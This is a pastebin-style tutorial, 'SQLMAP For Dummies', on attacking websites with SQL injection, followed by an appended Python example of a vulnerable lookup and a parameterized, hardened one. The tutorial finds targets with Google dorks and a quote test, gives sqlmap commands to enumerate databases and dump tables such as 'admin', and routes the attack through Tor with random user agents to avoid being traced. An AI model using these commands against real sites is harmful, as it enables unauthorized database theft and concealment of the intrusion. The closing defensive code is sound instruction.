SirUnnice

SqlMap

Jun 14th, 2015
  1. This tutorial is for educational purposes only. This information is not intended to aid in any form of illegal activity.
  2. SQLMAP For Dummies v1.0 - By Matrix -
  3. http://www.twitter.com/TheAnonMatrix
  4. Required for use: Backtrack5 R1.
  5. Start your Backtrack5 R1 (BT5) and start sqlmap; it can be found in /pentest/database/sqlmap/.
  6. Now let's get started!
  7. First we need a webpage; this is normally found by hand or by using dorks in Google. To find out if a page is vulnerable to an injection we do this:
  8. http://localhost.com/index.php?id=1337'
  9. Notice the ' here: ^
  10. This should give you a pretty error and a good start!
  11. Let's open sqlmap!
  12. So the first thing you need to learn is the options, or settings, you have to apply in sqlmap. The base is:
  13. python sqlmap.py -u <website>
  14. With a website we would simply do it like this:
  15. python sqlmap.py -u http://localhost/index.php?id=1337
  16. (note we did not add the ' here)
  17. -u stands for URL and tells sqlmap THIS is our URL. But we have to add more options for sqlmap to work:
  18. (note the following options use double dashes)
  19. --dbs to find DataBases
  20. --users to find users.
  21. python sqlmap.py -u http://localhost/index.php?id=1337 --dbs (and/or) --users
  22. (for the sake of length we will be assuming you used --dbs in this tutorial)
  23. After this command is run you should come up with 0 results, or some results. If you read the text you might be able to find some databases, and if you do, congrats!
  24. Should look like this:
  25. available databases [2]:
  26. [*] database1
  27. [*] database2
  28. Now to the fun part!
  29. python sqlmap.py -u http://localhost/index.php?id=1337 --tables -D database1
  30. This tells the program to find tables (--tables) in the database (-D) named database1.
  31. Once you execute this you will find (maybe) tons of tables. Locate the one you want... let's call it admin!
  32. python sqlmap.py -u http://localhost/index.php?id=1337 -D database1 -T admin
  33. Now you should see the info of the table admin. But now we should be able to dump it! This can be done by --dump or --dump-all.
  34. Examples:
  35. python sqlmap.py -u http://localhost/index.php?id=1337 --tables -D database1 --dump-all
  36. python sqlmap.py -u http://localhost/index.php?id=1337 -D database1 -T admin --dump
  37. --dump dumps the selected table's content, --dump-all dumps EVERYTHING!
  38. But, we should be secure?
  39. Tor with SQLMAP:
  40. First find /etc/apt/sources.list, open it and add:
  41. deb http://deb.torproject.org/torproject.org lucid main
  42. Open the terminal and use these commands:
  43. gpg --keyserver keys.gnupg.net --recv 886DDD89
  44. gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -
  45. And now we need more commands run as root:
  46. apt-get update
  47. apt-get install tor tor-geoipdb
  48. apt-get install polipo
  49. Start tor: /etc/init.d/tor start. Then grab a copy of this config file: https://gitweb.torproject.org/torbrowser.git/blob_plain/HEAD:/build-scripts/config/polipo.conf
  50. Go to /etc/polipoconfig and replace the file with the one above. Restart polipo: /etc/init.d/polipo restart
  51. Congrats! Now you can run sqlmap with TOR!
  52. python sqlmap.py -u http://localhost/index.php?id=1337 -D database1 -T admin --dump --tor --random-agent
  53. Happy safe hacking! ... and
  54. I hope you found this tutorial helpful. We encourage you to experience other tutorials and get the best possible education you can.
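
Why the single-quote test in steps 8-10 produces an error, and what the fixed handler looks like. This is an added example, not part of the original paste; the in-memory SQLite table `articles` and the function names `lookup_vulnerable` and `lookup_hardened` are assumptions made for illustration.

```python
import sqlite3

def make_db():
    # Constructed sample data standing in for the site's database (assumption).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT)")
    db.execute("INSERT INTO articles VALUES (1337, 'hello')")
    return db

def lookup_vulnerable(db, raw_id):
    # 'Before': the id parameter is pasted into the SQL text, so a stray quote
    # changes the statement itself and the driver error is shown to the client.
    try:
        row = db.execute("SELECT title FROM articles WHERE id = " + raw_id).fetchone()
    except sqlite3.Error as exc:
        return 500, "SQL error: %s" % exc   # verbose error: the "pretty error"
    return (200, row[0]) if row else (404, "not found")

def lookup_hardened(db, raw_id):
    # 'After': check the type first, then bind the value as a parameter so it
    # is never parsed as SQL; failures return a generic message only.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 18):
        return 400, "bad request"
    try:
        row = db.execute("SELECT title FROM articles WHERE id = ?",
                         (int(raw_id),)).fetchone()
    except sqlite3.Error:
        return 500, "internal error"        # details belong in server logs
    return (200, row[0]) if row else (404, "not found")

if __name__ == "__main__":
    db = make_db()
    for value in ("1337", "1337'"):
        print(repr(value), lookup_vulnerable(db, value), lookup_hardened(db, value))
```

With the hardened handler the quote never reaches the SQL parser, so the request is rejected with a 400 and no database error text is returned. The repeated 400s on a numeric parameter are also a useful signal to alert on.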